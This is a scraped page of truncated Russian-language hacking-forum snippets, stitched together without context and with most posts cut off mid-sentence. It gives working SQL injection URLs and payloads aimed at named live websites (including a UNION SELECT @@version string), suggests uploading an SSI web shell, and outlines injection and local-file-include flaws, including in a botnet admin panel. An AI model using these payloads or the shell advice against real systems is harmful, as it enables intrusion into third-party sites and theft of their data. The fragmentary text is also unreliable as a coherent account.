Separate names with a comma.
Зиродей ороро. Зачем весь этот говнокод? Все это можно заменить на простейшую форму без всяких скриптов. <form...
заливай SSI шелл. не раз спасал уже.
m-game.com.ua http://m-game.com.ua/?podr=compare&patch=catalog&version_ids=298+and+''='select' true //вырезается select...
Это русскоязычный форум. Пишите по-русски.
Интересный подзапрос....
Обзор уязвимостей админ панели Dirt Jumper 5 SQL Inj [INSERT] /index.php: [...] $ip=$_POST['k']; [...] mysql_query(" INSERT INTO `td`...
Если далее действия будут производиться с $path_parts['filename'](что очень маловероятно), то проблем возникнуть не должно используя:...
http://www.blackco.net/modules.php?name=photo&u=Stalker%20XL&un=1&clan=BlackCompany'%20and%201=1+union+select%201,@@version,3,4,5,6,7,8,9,10%20--%2...
SQL INJECTION (error-based) && Local File Include Для проведения SQL Inj необходимо посылать кавычку не url-кодируя ее в %27. В бд идет...
Показывай ссылку.
[email protected] как бы намекает.
фильтр. хотя слабо верится.
Ссылку нормально дай.
free-jpeg.ru SQL инъекция в INSERT запросе, параметр в куках, метод - Error based, дак еще и каптчу каждый раз придется вводить. :) POST...
пробуй UNION ALL SELECT 1,2
